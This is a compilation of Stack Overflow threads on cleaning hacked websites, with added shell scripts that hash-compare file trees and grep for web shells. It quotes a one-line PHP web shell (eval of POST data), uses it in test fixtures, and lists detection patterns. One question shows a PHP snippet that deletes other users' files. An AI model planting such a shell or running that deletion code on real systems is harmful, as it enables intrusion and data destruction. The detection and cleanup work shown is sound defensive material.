Closed. This question is off-topic. It is not currently accepting answers.
Closed 10 years ago.
I have the following problem:
The website I made for a friend has been infected with malware. When I tried to clean it by replacing the files I found to be different from the ones I uploaded with my original files, after a short time the files were different again. The file permissions are all 644, and the folders 755. It is as if whoever infected the files has access to change them whenever I change them back. Can anyone help me, since I am very new to this kind of problem?
First things first: report this to your webhost immediately! Secondly change all of your relevant passwords!
That being done, there are a few possible causes:
Your parent webhost has been compromised, in which case there is nothing you can do except move to a better host.
Your website contains a vulnerability that is being picked up by kiddies with their vuln-scanners. Be sure to audit your code to ensure that no user action can result in your website's filesystem being touched inappropriately; also check for SQL injection avenues.
Your website uses a widely-distributed application, such as WordPress, that has not been patched - this is a major problem.
Your own PC has been compromised and ne'er-do-wells have used a keylogger or other software to discover your FTP or SSH account details, and are abusing your website. Run a local scan and audit everything to ensure your bank account isn't being raided either.
This isn't a code-related problem. This isn't the place for your question.
But: It's likely that a program is running on your server and re-infecting the files. I'd recommend either taking it to a professional malware removal service, or (my preference) burning the server in a fire and allowing a new server to rise from the ashes. Then install an AV suite on the new server.
Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
Yesterday I got a bug in my WordPress site, where a hacker injected a script which can be seen by Googlebot only.
That script is not read or identified on normal browsers.
This is not causing issues with site availability or performance, but on Google search it gives advertisements instead of my site content, which is not good.
While searching on Google I got this:
https://aw-snap.info/articles/spam-hack-wordpress.php
I tried almost all the options given there.
Can anybody help me to identify the spam?
Thanks
Kiran Peshkar
Google offers a "view as Google" option in webmaster tools. This will help you to see what they see.
I tend to do two things if, when recovering one of my sites, it is not obvious what has caused the problem.
Upload a fresh copy of WordPress to my server. This will overwrite all the core files so if any have been hacked the malicious code will be overwritten.
It is likely that a malicious script is hidden somewhere, so if it is a simple site I will delete everything, reinstall and re-upload plugins. Of course anything in wp-content will need to be saved and restored. But note, a malicious script could be hidden in here.
It might just be easier to do a full restore at this point. Find a recent backup, upload the files and check with Google's tool to see if the malicious code is still active. It is always worth contacting your webhost for help, depending on how good they are they might even sort this out for you.
Remember, any attempt to restore or overwrite files could potentially impact your site or result in data loss so make sure you backup everything you need. Although it is unlikely the malicious code is in the WordPress database you should definitely back this up too.
Unfortunately there is no easy way to remove these types of hack, you never quite know what malicious code has been used. You should consider changing all passwords and reviewing your security so that the hacker doesn't do the same thing again as soon as you get the site up! Make sure all apps on the server are up to date.
Even the most secure WordPress sites get hit from time to time; this is why security is important and why daily backups are essential.
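An added shell example (not this answer's own procedure) of the comparison that decides whether a file should be overwritten or restored: it fingerprints a known-clean WordPress copy and the live tree and reports what was added, modified or is missing, so each file can be diffed before a full restore. Both trees are constructed fixtures.

```shell
#!/bin/sh
# Added example: fingerprint a known-clean copy (fresh download or trusted backup)
# and the live web root, then list files that were added, modified or are missing,
# so each can be inspected before anything is overwritten. Trees are constructed.

# hash_file FILE -> SHA-256 hex digest (sha256sum on Linux, shasum elsewhere)
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi |
        awk '{ print $1 }'
}

# manifest DIR -> one "digest  relative/path" line per regular file under DIR
manifest() {
    (cd "$1" && find . -type f | sort | while IFS= read -r f; do
        printf '%s  %s\n' "$(hash_file "$f")" "${f#./}"
    done)
}

# compare_trees CLEAN LIVE -> "added PATH", "modified PATH" or "removed PATH" lines.
# "removed" means present only in the clean copy; against a bare download that
# will include legitimate site files such as wp-config.php, so read it that way.
compare_trees() {
    clean_m=$(mktemp); live_m=$(mktemp)
    manifest "$1" > "$clean_m"; manifest "$2" > "$live_m"
    awk 'NR == FNR { clean[$2] = $1; next }
         { seen[$2] = 1; if (!($2 in clean)) print "added " $2; else if (clean[$2] != $1) print "modified " $2 }
         END { for (p in clean) if (!(p in seen)) print "removed " p }' "$clean_m" "$live_m" | sort
    rm -f "$clean_m" "$live_m"
}

# Constructed fixture: an identical core file, a tampered core file, a file only
# in the clean copy, and a dropped upload using the eval($_POST[...]) shape seen on this page.
make_trees() {
    base=$(mktemp -d)
    mkdir -p "$base/clean/wp-includes" "$base/live/wp-includes" "$base/live/wp-content/uploads"
    printf '<?php // core loader\n' > "$base/clean/wp-includes/load.php"
    printf '<?php // core loader\n' > "$base/live/wp-includes/load.php"
    printf '<?php // core settings\n' > "$base/clean/wp-settings.php"
    printf '<?php // core settings\neval($_POST["p1"]);\n' > "$base/live/wp-settings.php"
    printf '<?php // only in the clean copy\n' > "$base/clean/xmlrpc.php"
    printf '<?php eval($_POST["p1"]);\n' > "$base/live/wp-content/uploads/cache.php"
    echo "$base"
}

BASE=$(make_trees)
compare_trees "$BASE/clean" "$BASE/live"   # -> added wp-content/uploads/cache.php
                                           #    modified wp-settings.php
                                           #    removed xmlrpc.php
```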
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Closed 7 years ago.
I got trouble with some hackers, they hacked into our website, so I cloned our server to a new one, and then reset the github on that server.
I heard that rsync can find out what is different between 2 servers. Is it possible with rsync? Can I export that list of files to a text file?
Thanks for your help; I got hacked by using an old version of WordPress >_< I've been going crazy with this for the last couple of days.
The comment by Marty is good - the rsync command as written will do a dry-run (-n) to show you what files were added/deleted/changed between the $TARGET and $SOURCE locations so you can then inspect or diff them to see if there is any malicious code.
Additionally, in the past when I've dealt with hacked WordPress installs, it is important to find the exploitation vector. Oftentimes PHP shells get uploaded via some insecure script or plugin, which gives the attacker a command-based web shell to view files and run commands etc.
To find these files, the following command is helpful:
grep -RE '((shell_)?exec|system|eval)' /path/to/wordpress/*
This might yield something like:
wpte.php: eval($_POST['p1']);
In this case, wpte.php was a malicious PHP shell script that got uploaded to one of my client's servers, which someone then used to run commands and upload more files. These scripts usually use one or more functions like eval or shell_exec to run commands input from the web shell.
Going from there, you can check the server access logs for hits to the malicious script and then further search the logs for the IP address(es) that accessed that script, to potentially find how they uploaded the script or other resources they accessed.
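A worked version of the search-then-correlate routine above, added here as an example rather than taken from this answer: it widens the grep to the functions web shells commonly wrap around request data, then joins each flagged file against the access log to list the client IPs that called it. The web root, the wpte.php file and the log lines are constructed fixtures.

```shell
#!/bin/sh
# Added example: scan a web root for PHP files that hand data to code-execution
# functions, then pull the access-log hits on each flagged file and the client
# IPs behind them. The web root and the log are constructed fixtures.

# Functions that web shells typically wrap around request data, followed by "(".
SUSPECT_RE='(^|[^[:alnum:]_])(eval|assert|shell_exec|exec|system|passthru|popen|proc_open)[[:space:]]*\('

# find_suspicious WEBROOT -> "file:line:text" for every match under WEBROOT
find_suspicious() {
    find "$1" -name '*.php' -exec grep -HnE "$SUSPECT_RE" {} \; | sort
}

# hits_for_file ACCESS_LOG SCRIPT_NAME -> log lines that requested that script
hits_for_file() {
    grep -F "/$2" "$1"
}

# ips_for_file ACCESS_LOG SCRIPT_NAME -> unique client IPs that requested it
ips_for_file() {
    hits_for_file "$1" "$2" | awk '{ print $1 }' | sort -u
}

# Constructed fixture: a benign index.php, a dropped shell modelled on the
# wpte.php line quoted in the answer, and a combined-format access log.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads"
    printf '<?php echo "hello";\n' > "$root/index.php"
    printf '<?php eval($_POST["p1"]);\n' > "$root/wp-content/uploads/wpte.php"
    cat > "$root/access.log" <<'EOF'
203.0.113.5 - - [01/Jan/2015:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2015:10:01:44 +0000] "POST /wp-content/uploads/wpte.php HTTP/1.1" 200 88
198.51.100.7 - - [01/Jan/2015:10:02:10 +0000] "POST /wp-content/uploads/wpte.php HTTP/1.1" 200 91
EOF
    echo "$root"
}

ROOT=$(make_fixture)
find_suspicious "$ROOT"                   # -> .../wp-content/uploads/wpte.php:1:<?php eval($_POST["p1"]);
ips_for_file "$ROOT/access.log" wpte.php  # -> 198.51.100.7
```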
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Closed 9 years ago.
Someone placed a script on my site that sends email. How can I find this script?
I use Parallels and Linux CentOS.
I searched the site for the keyword "mail(", but it could also be that the code looks like a hash.
It could be anywhere, and it could be anything. It could even have been deleted.
We did have a situation a while back where a client lost control of their password due to a keylogger and someone was uploading a CGI script to spam emails, running it then deleting it. We only found out via FTP logs what was going on.
Try checking your FTP logs and web server logs, and if all that fails and you are sure it is PHP, then try searching for eval( as that is an often-used tactic to hide what a script is doing.
More importantly though, my suggestion would be to get someone who is experienced in server management to have a look at your site as a matter of urgency. If they were able to upload a file to your site once, then even if you remove it, it won't stop them doing it again until you find exactly how they were able to do it.
You might also have a look at your scripts. Is there a contact form somewhere on your site? You might not have escaped user input very well, which gives an attacker the ability to send mails to other recipients.
I had a similar situation in my early days until the host blocked the script and told me to fix it.
Closed. This question is off-topic. It is not currently accepting answers.
Closed 10 years ago.
Not long ago I upgraded to a dedicated server, and in order to make it more cost efficient for me, I decided to rent some space on the server to people I know (friends, family). Some of the people I know have some other guy who is in charge of the website development, and I want to protect myself, and any of the other guys I rented to, from unauthorized access.
One of the cases which concerns me the most is PHP getting access to other users or me by accessing ../ from their root.
For instance, they could do something like this: foreach(glob('../*/*.*') as $some_file){unlink($some_file);} which would delete all the files from a sibling user.
How do I prevent people from doing this sort of thing?
This sounds like an issue that can be resolved through system administration.
Edit your php.ini file, restricting the values in open_basedir
Make sure your users are assigned to different groups
chmod your home directories og-wx (e.g. 744, 740, 700, etc...)
Run multiple instances of apache server, possibly under different users/groups
It really depends on how much effort you want to put into it and how robust the security needs to be.
http://www.php.net/manual/en/ini.core.php#ini.open-basedir
http://wiki.apache.org/httpd/RunningMultipleApacheInstances
You should consider dctrucker's post on permissions and make sure the Apache process (if you are running PHP with mod_php) or the PHP processes (if you are running it on FastCGI) don't have the permissions to change permissions. I wouldn't advise the open_basedir approach if security is your concern, because then one can just use ini_set to override it (so if using that approach you should disable ini_set as well).
Closed. This question is off-topic. It is not currently accepting answers.
Closed 11 years ago.
I'm sorry if this is not really an appropriate question to ask on here, but this has happened to me a number of times and I don't understand what's going on, because I do not have an upload form on my website. Somehow someone is uploading lots of PHP files to my FTP server. These files were even picking up traffic through Google Analytics. I have a contact form, and it does need to be beefed up security-wise, but can a hacker UPLOAD files and alter my .htaccess file through it?
What type of hack is that? I would love to do more research on it to take preventative measures.
It is very possible for a hacker to upload files through a PHP site. I've seen it many times.
PHP has the potential to be very insecure. Getting in through PHP isn't very hard if your configuration is weak. Check your access logs and look for anything that seems wrong, particularly a whole bunch of requests from a single IP address. If they are in that deep, your access log may itself be compromised, and beyond even that.
Contact forms and database-driven pages are easy to create with vulnerabilities, and no amount of PHP configuration tweaking will fix that. Look for cross-site scripting vulnerabilities and, if you're using a database, SQL injection attacks, and make sure that there is nowhere in your website that uses a GET parameter in a file path, like reading a file or writing a file. Don't count on stripping a GET parameter, don't count on regexing it clean, just don't do it.
With regard to FTP, if you can, just turn it off and only upload files through SFTP or SCP. If possible, don't use password authentication, use public key instead.
Ultimately if they are changing files on your file system, you may end up saving yourself time by fixing any vulnerabilities you can find, re-installing the OS from scratch, and reconfiguring PHP and FTP to be secure.
There are some toolkits out there that will do basic tests against your site that are worth a look too. Check out https://www.owasp.org/index.php/Main_Page
Does the form have an upload function? Do you check file types etc.? Someone could easily upload a PHP shell (c99, c100) and alter what's on your account.